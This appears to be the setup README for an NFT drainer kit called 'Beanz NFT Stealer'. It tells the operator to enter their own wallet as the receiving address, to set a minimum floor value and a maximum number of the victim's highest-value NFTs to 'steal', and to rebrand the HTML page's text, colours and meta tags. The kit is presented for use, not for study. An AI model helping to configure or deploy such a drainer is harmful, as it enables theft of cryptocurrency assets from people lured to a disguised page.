==============================
  Beanz NFT Stealer Setup
==============================

Open `index.js` in Visual Studio Code or any text editor.

1. SET WALLET ADDRESS

   const receiveAddress = "0x0000000000000000000000000000000000000000";
   // Your ETH wallet address – where NFTs will be received

2. SET MINIMUM NFT VALUE

   minValue: 0.1,
   // Only NFTs above this floor value will be stole

3. SET MAXIMUM TRANSFERS

   maxTransfer: 4,
   // Max number of NFTs to "steal" – highest value NFTs are chosen

-----------------------------

EDIT TEXT AND COLORS

- Open `index.html` to customize:
  > Page colors
  > Text content (titles, messages, buttons)
  > Meta tags and branding

------------------------------
